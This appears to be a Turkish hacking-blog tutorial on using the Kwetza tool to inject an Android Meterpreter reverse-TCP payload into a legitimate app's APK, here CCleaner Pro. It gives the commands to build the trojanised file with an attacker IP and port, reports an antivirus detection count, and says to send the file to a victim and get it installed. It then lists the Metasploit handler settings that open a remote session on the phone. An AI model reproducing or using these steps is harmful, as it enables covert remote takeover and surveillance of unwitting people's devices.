Kali Linux Android Hack 2

Selamun Aleyküm ..


Kwetza, Android Uygulamalarinin Varsayilan İzinlerini Kullanarak İşlevsellik Kazanmak İçin Gerekli İzinleri Oluşturup Bu İzinleri Mevcut Android Uygulamasina (APK) Enjekte Etememize Yarar.
 Yani Kısaca Mevcut Bi Android Uygulamasına Meterpreter Payloadı Enjekte Etmenizi Sağlar.
git clone https://github.com/sensepost/kwetza.git
Yazarak İndrin
Kwetza Piton İle Yazılmıştır Ve PİP Kullanarak Kurulabilen BeautifulSoup Gerektirir.
pip install beautifulsoup4
Kullandığınız İşletim Sisteminde Apktool'un Kurulu Olması Gerekiyor Eğer Değilse Buradan Bakıp İndirip Yükleyin Yada apt-get install apktool
Şimdi Hedef Bi Tane Android Uygulaması Bulun Yani Karşı Tarafa Göndereceğimiz Apk Ben Cclenear Uygulamasının Apk'sini İndirdim Bu Apk Bir Oyun Olabilir Yada Başka Birşey. Ccleaner-pro.apk 'sini Kwetza Klasörünün İçine Attım Ardından chmod +x kwetza.py Yazarak Gereken İzinleri Verdik.


Yeni Bi Terminal (Komut Satiri) Açip ifconfig Yazarak Yerel İp Adresimizi Öğreniyoruz.
192.168.38.128
python kwetza.py ccleaner.apk 192.168.1.9 4444 yes
Yazarak Zararli Android Uygulamamizi Oluşturuyoruz.
ccleaner.apk Paylod Enjekte Edeceğimiz Apk
192.168.1.9 Bağlantı Sağlayacığımız İp Adresi
4444 Bağlantı Sağlayacağımız Port Numarası 
Oluşturmaya Başladıktan Sonra Bizden  Şifre Girmemizi İstiyor Default Olarak password Yazıp Onaylıyoruz Ve Zararli Uygulamamizi Oluşturdu
Zararlı Uygulamamizi Kwetza Klasörünün İçine Uygulamamız Adında Dosya Oluşturup Dist Dosyasının İçine ccleaner.apk Olarak Kayıt Etti.
Virüs Total Sonucu Burada
59 Antivürüsden 6 Tanesi Yakaladi Neyse Bu Olusturdugumuz Apk yi Bir Şekilde Hedefe Gönderip Telefona Kurmasını Sağlıyoruz Ardından Metasploit'i Açıp Gerekli Exploiti Ve Payloadı Belirtip Ayarları Yaptıktan Sonra Exploit Ediyoruz

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.9
set lport 4444
exploit 
Yazarak Exploit Ediyoruz Ve Oturum Açılıyor
Normalde Bu Apk yi Test Edicektim Ancak Diğer Pc de Sıkıntı Yaşadım O Yüzden Test Etme Şansım Olmadı Umarım Anlasılır OLmustur...

TrazeR Sunar /

Share
Tepkiler: 
Uyari: Telif hakkı tamamen kaynağa aittir. Bu konuyla ilgili bir sorun varsa, burada bizimle iletişime geçebilirsiniz. Contact.

EN SON MAKALELER

Yorum Gönder